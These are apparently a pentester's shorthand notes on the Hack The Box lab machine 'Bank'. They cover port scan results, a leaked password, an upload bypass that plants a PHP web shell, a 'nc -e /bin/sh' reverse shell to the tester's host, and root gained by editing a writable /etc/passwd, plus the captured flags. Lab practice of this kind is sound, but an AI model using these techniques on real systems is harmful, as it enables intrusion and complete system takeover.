10.10.10.29
                                                            
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)      

53/tcp open  domain  syn-ack ttl 63 ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
	@.bank.htb 10.10.10.29
	ns.bank.htb 10.10.10.29
	chris.bank.htb. 

80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.7 ((Ubuntu))
	bank.htb
	/balance-transfer
		Full Name: Christos Christopoulos
		Email: chris@bank.htb
		Password: !##HTBB4nkP4ssw0rd!##
			
File upload - inspected in burp
		Content-Disposition: form-data; name="fileToUpload"; filename="lego.htb"
	Content-Type: image/png
PNG
 	<?php echo system($_REQUEST['dan']); ?
	
		Change extension type to .htb as this allow PHP to run
		
located file upload and added "?dan=%20 nc -e /bin/sh 10.10.14.16 1234" to spawn a shell 

user.txt
#f0dde45e391969483118d092c89c9ae7

                                     
linPEAS
                                
        /etc/passwd    file is RW

      Genmerate password with openssl and add to root in passwd
                                  
      mfX/BwHM1XeQs

      su root
      enter created password
                                
                                  
                                  
root.txt
#62d632cb1476001633f193810a6c98cf

          
                               

		
